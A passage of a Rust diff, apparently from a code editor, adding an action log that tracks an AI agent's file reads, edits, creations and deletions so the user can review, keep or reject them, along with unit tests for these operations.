tracked_buffer.snapshot = buffer_snapshot; + tracked_buffer.unreviewed_changes = unreviewed_changes; + cx.notify(); + anyhow::Ok(()) + })??; + } + + Ok(()) + } + + /// Track a buffer as read, so we can notify the model about user edits. + pub fn buffer_read(&mut self, buffer: Entity, cx: &mut Context) { + self.track_buffer_internal(buffer, false, cx); + } + + /// Mark a buffer as edited, so we can refresh it in the context + pub fn buffer_created(&mut self, buffer: Entity, cx: &mut Context) { + self.edited_since_project_diagnostics_check = true; + self.tracked_buffers.remove(&buffer); + self.track_buffer_internal(buffer.clone(), true, cx); + } + + /// Mark a buffer as edited, so we can refresh it in the context + pub fn buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { + self.edited_since_project_diagnostics_check = true; + + let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); + if let TrackedBufferStatus::Deleted = tracked_buffer.status { + tracked_buffer.status = TrackedBufferStatus::Modified; + } + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } + + pub fn will_delete_buffer(&mut self, buffer: Entity, cx: &mut Context) { + let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); + match tracked_buffer.status { + TrackedBufferStatus::Created => { + self.tracked_buffers.remove(&buffer); + cx.notify(); + } + TrackedBufferStatus::Modified => { + buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); + tracked_buffer.status = TrackedBufferStatus::Deleted; + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } + TrackedBufferStatus::Deleted => {} + } + cx.notify(); + } + + pub fn keep_edits_in_range( + &mut self, + buffer: Entity, + buffer_range: Range, + cx: &mut Context, + ) { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return; + }; + + match tracked_buffer.status { + TrackedBufferStatus::Deleted => { + self.tracked_buffers.remove(&buffer); + cx.notify(); + } + _ => { + let buffer = buffer.read(cx); + let buffer_range = + buffer_range.start.to_point(buffer)..buffer_range.end.to_point(buffer); + let mut delta = 0i32; + + tracked_buffer.unreviewed_changes.retain_mut(|edit| { + edit.old.start = (edit.old.start as i32 + delta) as u32; + edit.old.end = (edit.old.end as i32 + delta) as u32; + + if buffer_range.end.row < edit.new.start + || buffer_range.start.row > edit.new.end + { + true + } else { + let old_range = tracked_buffer + .base_text + .point_to_offset(Point::new(edit.old.start, 0)) + ..tracked_buffer.base_text.point_to_offset(cmp::min( + Point::new(edit.old.end, 0), + tracked_buffer.base_text.max_point(), + )); + let new_range = tracked_buffer + .snapshot + .point_to_offset(Point::new(edit.new.start, 0)) + ..tracked_buffer.snapshot.point_to_offset(cmp::min( + Point::new(edit.new.end, 0), + tracked_buffer.snapshot.max_point(), + )); + tracked_buffer.base_text.replace( + old_range, + &tracked_buffer + .snapshot + .text_for_range(new_range) + .collect::(), + ); + delta += edit.new_len() as i32 - edit.old_len() as i32; + false + } + }); + tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); + } + } + } + + pub fn reject_edits_in_ranges( + &mut self, + buffer: Entity, + buffer_ranges: Vec>, + cx: &mut Context, + ) -> Task> { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return Task::ready(Ok(())); + }; + + match tracked_buffer.status { + TrackedBufferStatus::Created => { + let delete = buffer + .read(cx) + .entry_id(cx) + .and_then(|entry_id| { + self.project + .update(cx, |project, cx| project.delete_entry(entry_id, false, cx)) + }) + .unwrap_or(Task::ready(Ok(()))); + self.tracked_buffers.remove(&buffer); + cx.notify(); + delete + } + TrackedBufferStatus::Deleted => { + buffer.update(cx, |buffer, cx| { + buffer.set_text(tracked_buffer.base_text.to_string(), cx) + }); + let save = self + .project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)); + + // Clear all tracked changes for this buffer and start over as if we just read it. + self.tracked_buffers.remove(&buffer); + self.buffer_read(buffer.clone(), cx); + cx.notify(); + save + } + TrackedBufferStatus::Modified => { + buffer.update(cx, |buffer, cx| { + let mut buffer_row_ranges = buffer_ranges + .into_iter() + .map(|range| { + range.start.to_point(buffer).row..range.end.to_point(buffer).row + }) + .peekable(); + + let mut edits_to_revert = Vec::new(); + for edit in tracked_buffer.unreviewed_changes.edits() { + let new_range = tracked_buffer + .snapshot + .anchor_before(Point::new(edit.new.start, 0)) + ..tracked_buffer.snapshot.anchor_after(cmp::min( + Point::new(edit.new.end, 0), + tracked_buffer.snapshot.max_point(), + )); + let new_row_range = new_range.start.to_point(buffer).row + ..new_range.end.to_point(buffer).row; + + let mut revert = false; + while let Some(buffer_row_range) = buffer_row_ranges.peek() { + if buffer_row_range.end < new_row_range.start { + buffer_row_ranges.next(); + } else if buffer_row_range.start > new_row_range.end { + break; + } else { + revert = true; + break; + } + } + + if revert { + let old_range = tracked_buffer + .base_text + .point_to_offset(Point::new(edit.old.start, 0)) + ..tracked_buffer.base_text.point_to_offset(cmp::min( + Point::new(edit.old.end, 0), + tracked_buffer.base_text.max_point(), + )); + let old_text = tracked_buffer + .base_text + .chunks_in_range(old_range) + .collect::(); + edits_to_revert.push((new_range, old_text)); + } + } + + buffer.edit(edits_to_revert, None, cx); + }); + self.project + .update(cx, |project, cx| project.save_buffer(buffer, cx)) + } + } + } + + pub fn keep_all_edits(&mut self, cx: &mut Context) { + self.tracked_buffers + .retain(|_buffer, tracked_buffer| match tracked_buffer.status { + TrackedBufferStatus::Deleted => false, + _ => { + tracked_buffer.unreviewed_changes.clear(); + tracked_buffer.base_text = tracked_buffer.snapshot.as_rope().clone(); + tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); + true + } + }); + cx.notify(); + } + + /// Returns the set of buffers that contain changes that haven't been reviewed by the user. + pub fn changed_buffers(&self, cx: &App) -> BTreeMap, Entity> { + self.tracked_buffers + .iter() + .filter(|(_, tracked)| tracked.has_changes(cx)) + .map(|(buffer, tracked)| (buffer.clone(), tracked.diff.clone())) + .collect() + } + + /// Iterate over buffers changed since last read or edited by the model + pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator> { + self.tracked_buffers + .iter() + .filter(|(buffer, tracked)| { + let buffer = buffer.read(cx); + + tracked.version != buffer.version + && buffer + .file() + .map_or(false, |file| file.disk_state() != DiskState::Deleted) + }) + .map(|(buffer, _)| buffer) + } +} + +fn apply_non_conflicting_edits( + patch: &Patch, + edits: Vec>, + old_text: &mut Rope, + new_text: &Rope, +) { + let mut old_edits = patch.edits().iter().cloned().peekable(); + let mut new_edits = edits.into_iter().peekable(); + let mut applied_delta = 0i32; + let mut rebased_delta = 0i32; + + while let Some(mut new_edit) = new_edits.next() { + let mut conflict = false; + + // Push all the old edits that are before this new edit or that intersect with it. + while let Some(old_edit) = old_edits.peek() { + if new_edit.old.end < old_edit.new.start + || (!old_edit.new.is_empty() && new_edit.old.end == old_edit.new.start) + { + break; + } else if new_edit.old.start > old_edit.new.end + || (!old_edit.new.is_empty() && new_edit.old.start == old_edit.new.end) + { + let old_edit = old_edits.next().unwrap(); + rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; + } else { + conflict = true; + if new_edits + .peek() + .map_or(false, |next_edit| next_edit.old.overlaps(&old_edit.new)) + { + new_edit = new_edits.next().unwrap(); + } else { + let old_edit = old_edits.next().unwrap(); + rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; + } + } + } + + if !conflict { + // This edit doesn't intersect with any old edit, so we can apply it to the old text. + new_edit.old.start = (new_edit.old.start as i32 + applied_delta - rebased_delta) as u32; + new_edit.old.end = (new_edit.old.end as i32 + applied_delta - rebased_delta) as u32; + let old_bytes = old_text.point_to_offset(Point::new(new_edit.old.start, 0)) + ..old_text.point_to_offset(cmp::min( + Point::new(new_edit.old.end, 0), + old_text.max_point(), + )); + let new_bytes = new_text.point_to_offset(Point::new(new_edit.new.start, 0)) + ..new_text.point_to_offset(cmp::min( + Point::new(new_edit.new.end, 0), + new_text.max_point(), + )); + + old_text.replace( + old_bytes, + &new_text.chunks_in_range(new_bytes).collect::(), + ); + applied_delta += new_edit.new_len() as i32 - new_edit.old_len() as i32; + } + } +} + +fn diff_snapshots( + old_snapshot: &text::BufferSnapshot, + new_snapshot: &text::BufferSnapshot, +) -> Vec> { + let mut edits = new_snapshot + .edits_since::(&old_snapshot.version) + .map(|edit| point_to_row_edit(edit, old_snapshot.as_rope(), new_snapshot.as_rope())) + .peekable(); + let mut row_edits = Vec::new(); + while let Some(mut edit) = edits.next() { + while let Some(next_edit) = edits.peek() { + if edit.old.end >= next_edit.old.start { + edit.old.end = next_edit.old.end; + edit.new.end = next_edit.new.end; + edits.next(); + } else { + break; + } + } + row_edits.push(edit); + } + row_edits +} + +fn point_to_row_edit(edit: Edit, old_text: &Rope, new_text: &Rope) -> Edit { + if edit.old.start.column == old_text.line_len(edit.old.start.row) + && new_text + .chars_at(new_text.point_to_offset(edit.new.start)) + .next() + == Some('\n') + && edit.old.start != old_text.max_point() + { + Edit { + old: edit.old.start.row + 1..edit.old.end.row + 1, + new: edit.new.start.row + 1..edit.new.end.row + 1, + } + } else if edit.old.start.column == 0 + && edit.old.end.column == 0 + && edit.new.end.column == 0 + && edit.old.end != old_text.max_point() + { + Edit { + old: edit.old.start.row..edit.old.end.row, + new: edit.new.start.row..edit.new.end.row, + } + } else { + Edit { + old: edit.old.start.row..edit.old.end.row + 1, + new: edit.new.start.row..edit.new.end.row + 1, + } + } +} + +#[derive(Copy, Clone, Debug)] +enum ChangeAuthor { + User, + Agent, +} + +#[derive(Copy, Clone, Eq, PartialEq)] +enum TrackedBufferStatus { + Created, + Modified, + Deleted, +} + +struct TrackedBuffer { + buffer: Entity, + base_text: Rope, + unreviewed_changes: Patch, + status: TrackedBufferStatus, + version: clock::Global, + diff: Entity, + snapshot: text::BufferSnapshot, + diff_update: mpsc::UnboundedSender<(ChangeAuthor, text::BufferSnapshot)>, + _open_lsp_handle: OpenLspBufferHandle, + _maintain_diff: Task<()>, + _subscription: Subscription, +} + +impl TrackedBuffer { + fn has_changes(&self, cx: &App) -> bool { + self.diff + .read(cx) + .hunks(&self.buffer.read(cx), cx) + .next() + .is_some() + } + + fn schedule_diff_update(&self, author: ChangeAuthor, cx: &App) { + self.diff_update + .unbounded_send((author, self.buffer.read(cx).text_snapshot())) + .ok(); + } +} + +pub struct ChangedBuffer { + pub diff: Entity, +} + +#[cfg(test)] +mod tests { + use std::env; + + use super::*; + use buffer_diff::DiffHunkStatusKind; + use gpui::TestAppContext; + use language::Point; + use project::{FakeFs, Fs, Project, RemoveOptions}; + use rand::prelude::*; + use serde_json::json; + use settings::SettingsStore; + use util::{RandomCharIter, path}; + + #[ctor::ctor] + fn init_logger() { + zlog::init_test(); + } + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + language::init(cx); + Project::init_settings(cx); + }); + } + + #[gpui::test(iterations = 10)] + async fn test_keep_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 1)..Point::new(1, 2), "E")], None, cx) + .unwrap() + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(4, 2)..Point::new(4, 3), "O")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndEf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(2, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(4, 0)..Point::new(4, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + } + ], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(3, 0)..Point::new(4, 3), cx) + }); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(2, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(4, 3), cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_deletions(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({"file": "abc\ndef\nghi\njkl\nmno\npqr"}), + ) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 0)..Point::new(2, 0), "")], None, cx) + .unwrap(); + buffer.finalize_last_transaction(); + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(3, 0)..Point::new(4, 0), "")], None, cx) + .unwrap(); + buffer.finalize_last_transaction(); + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\nghi\njkl\npqr" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(1, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(3, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "mno\n".into(), + } + ], + )] + ); + + buffer.update(cx, |buffer, cx| buffer.undo(cx)); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\nghi\njkl\nmno\npqr" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(1, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "def\n".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(1, 0)..Point::new(1, 0), cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_overlapping_user_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 2)..Point::new(2, 3), "F\nGHI")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndeF\nGHI\njkl\nmno" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\nghi\n".into(), + }], + )] + ); + + buffer.update(cx, |buffer, cx| { + buffer.edit( + [ + (Point::new(0, 2)..Point::new(0, 2), "X"), + (Point::new(3, 0)..Point::new(3, 0), "Y"), + ], + None, + cx, + ) + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abXc\ndeF\nGHI\nYjkl\nmno" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\nghi\n".into(), + }], + )] + ); + + buffer.update(cx, |buffer, cx| { + buffer.edit([(Point::new(1, 1)..Point::new(1, 1), "Z")], None, cx) + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abXc\ndZeF\nGHI\nYjkl\nmno" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\nghi\n".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(1, 0), cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_creating_files(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({})).await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) + .unwrap(); + + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| buffer.set_text("lorem", cx)); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 5), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )] + ); + + buffer.update(cx, |buffer, cx| buffer.edit([(0..0, "X")], None, cx)); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 6), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), 0..5, cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_deleting_files(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({"file1": "lorem\n", "file2": "ipsum\n"}), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let file1_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) + .unwrap(); + let file2_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file2", cx)) + .unwrap(); + + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let buffer1 = project + .update(cx, |project, cx| { + project.open_buffer(file1_path.clone(), cx) + }) + .await + .unwrap(); + let buffer2 = project + .update(cx, |project, cx| { + project.open_buffer(file2_path.clone(), cx) + }) + .await + .unwrap(); + + action_log.update(cx, |log, cx| log.will_delete_buffer(buffer1.clone(), cx)); + action_log.update(cx, |log, cx| log.will_delete_buffer(buffer2.clone(), cx)); + project + .update(cx, |project, cx| { + project.delete_file(file1_path.clone(), false, cx) + }) + .unwrap() + .await + .unwrap(); + project + .update(cx, |project, cx| { + project.delete_file(file2_path.clone(), false, cx) + }) + .unwrap() + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![ + ( + buffer1.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "lorem\n".into(), + }] + ), + ( + buffer2.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "ipsum\n".into(), + }], + ) + ] + ); + + // Simulate file1 being recreated externally. + fs.insert_file(path!("/dir/file1"), "LOREM".as_bytes().to_vec()) + .await; + + // Simulate file2 being recreated by a tool. + let buffer2 = project + .update(cx, |project, cx| project.open_buffer(file2_path, cx)) + .await + .unwrap(); + action_log.update(cx, |log, cx| log.buffer_read(buffer2.clone(), cx)); + buffer2.update(cx, |buffer, cx| buffer.set_text("IPSUM", cx)); + action_log.update(cx, |log, cx| log.buffer_edited(buffer2.clone(), cx)); + project + .update(cx, |project, cx| project.save_buffer(buffer2.clone(), cx)) + .await + .unwrap(); + + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer2.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 5), + diff_status: DiffHunkStatusKind::Modified, + old_text: "ipsum\n".into(), + }], + )] + ); + + // Simulate file2 being deleted externally. + fs.remove_file(path!("/dir/file2").as_ref(), RemoveOptions::default()) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) + .unwrap() + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndE\nXYZf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(5, 0)..Point::new(5, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + } + ], + )] + ); + + // If the rejected range doesn't overlap with any hunk, we ignore it. + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(4, 0)..Point::new(4, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndE\nXYZf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(5, 0)..Point::new(5, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + } + ], + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(0, 0)..Point::new(1, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(4, 0)..Point::new(4, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + }], + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(4, 0)..Point::new(4, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmno" + ); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_multiple_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) + .unwrap() + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndE\nXYZf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(5, 0)..Point::new(5, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + } + ], + )] + ); + + action_log.update(cx, |log, cx| { + let range_1 = buffer.read(cx).anchor_before(Point::new(0, 0)) + ..buffer.read(cx).anchor_before(Point::new(1, 0)); + let range_2 = buffer.read(cx).anchor_before(Point::new(5, 0)) + ..buffer.read(cx).anchor_before(Point::new(5, 3)); + + log.reject_edits_in_ranges(buffer.clone(), vec![range_1, range_2], cx) + .detach(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmno" + ); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmno" + ); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_deleted_file(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "content"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path.clone(), cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| { + project.delete_file(file_path.clone(), false, cx) + }) + .unwrap() + .await + .unwrap(); + cx.run_until_parked(); + assert!(!fs.is_file(path!("/dir/file").as_ref()).await); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "content".into(), + }] + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(0, 0)..Point::new(0, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |buffer, _| buffer.text()), "content"); + assert!(fs.is_file(path!("/dir/file").as_ref()).await); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_created_file(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/new_file", cx) + }) + .unwrap(); + + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + 